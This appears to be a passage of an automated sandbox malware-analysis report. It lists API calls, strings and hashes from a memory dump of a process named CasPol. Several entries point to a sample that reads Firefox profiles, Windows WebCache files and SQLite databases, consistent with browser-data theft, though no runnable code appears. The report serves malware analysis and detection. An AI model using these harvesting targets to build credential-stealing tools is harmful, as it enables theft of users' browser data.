                                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                APIs
                                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy
                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                • API String ID: 3510742995-2641926074
                                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                APIs
                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                • String ID: $0.@
                                                                                                • API String ID: 2758756878-1896041820
                                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 2941347001-0
                                                                                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                • API String ID: 3249829328-1174173950
                                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0040A824
                                                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 669240632-0
                                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                APIs
                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                • String ID: "%s"
                                                                                                • API String ID: 1343145685-3297466227
                                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                • API String ID: 1714573020-3385500049
                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 2911713577-0
                                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                APIs
                                                                                                • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID: @ $SQLite format 3
                                                                                                • API String ID: 1475443563-3708268960
                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                APIs
                                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                • API String ID: 2705122986-2036018995
                                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcsicmpqsort
                                                                                                • String ID: /nosort$/sort
                                                                                                • API String ID: 1579243037-1578091866
                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                Strings
                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                • API String ID: 3354267031-2114579845
                                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                APIs
                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                • String ID:
                                                                                                • API String ID: 3473537107-0
                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                APIs
                                                                                                Strings
                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset
                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                • API String ID: 2221118986-1725073988
                                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@DeleteObject
                                                                                                • String ID: r!A
                                                                                                • API String ID: 1103273653-628097481
                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                APIs
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1033339047-0
                                                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                APIs
                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$memcmp
                                                                                                • String ID: $$8
                                                                                                • API String ID: 2808797137-435121686
                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                APIs
                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                • String ID:
                                                                                                • API String ID: 1979745280-0
                                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                APIs
                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
